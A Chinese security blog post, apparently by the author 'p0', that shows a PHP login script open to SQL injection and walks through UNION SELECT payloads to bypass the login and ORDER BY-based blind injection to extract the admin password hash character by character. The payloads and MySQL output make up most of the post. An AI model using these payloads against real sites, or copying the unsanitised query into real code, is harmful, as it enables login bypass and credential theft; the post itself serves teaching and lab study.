利用order by 进行盲注

0x01 利用场景

登录代码：

$username = $_POST['username'];
$password = $_POST['password'];
if(filter($username)){
    //过滤括号
}else{
    $sql="SELECT * FROM admin WHERE username='".$username."'";
    $result=mysql_query($sql);
    @$row = mysql_fetch_array($result);
    if(isset($row) && $row['username'] === 'admin'){
        if ($row['password']===md5($password)){
            //Login successful
        }else{
            die("password error!");
        }
    }else{
        die("username does not exist!");
    }
}

有下列表：

mysql> select * from admin where username='admin';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

这样一个一般的场景，用户登录时，用户名错误提示：用户名错误，用户名正确密码错误提示：密码错误

0x02 UNION SELECT登录

看到这个逻辑第一想法肯定是直接利用union select伪造密码登录：

username=' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b&password=1

mysql> select * from admin where username='' union select 1,'admin','c4ca4238a0b923820dcc509a6f75849b';
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | c4ca4238a0b923820dcc509a6f75849b |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

但是想得到password怎么办

0x03 利用order by起飞

由登录提示可获取一个bool条件，如何用order by利用这个bool条件

mysql> select * from admin where username='' or 1 union select 1,2,'5' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 5                                |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'6' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 6                                |
+----+----------+----------------------------------+
2 rows in set (0.01 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'51' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | 2        | 51                               |
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

mysql> select * from admin where username='' or 1 union select 1,2,'52' order by 3;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 51b7a76d51e70b419f60d3473fb6f900 |
|  1 | 2        | 52                               |
+----+----------+----------------------------------+
2 rows in set (0.00 sec)

通过逐位判断便可得到password

显然此方法在实际中使用的不多，但在一些特定的环境中也许会用到，比如实验环境，如果过滤了括号，其他盲注基本上就是废了，便可利用order by进行注入。

著作权归作者所有。
商业转载请联系作者获得授权，非商业转载请注明出处。
作者：p0
链接：http://p0sec.net/index.php/archives/106/
来源：http://p0sec.net/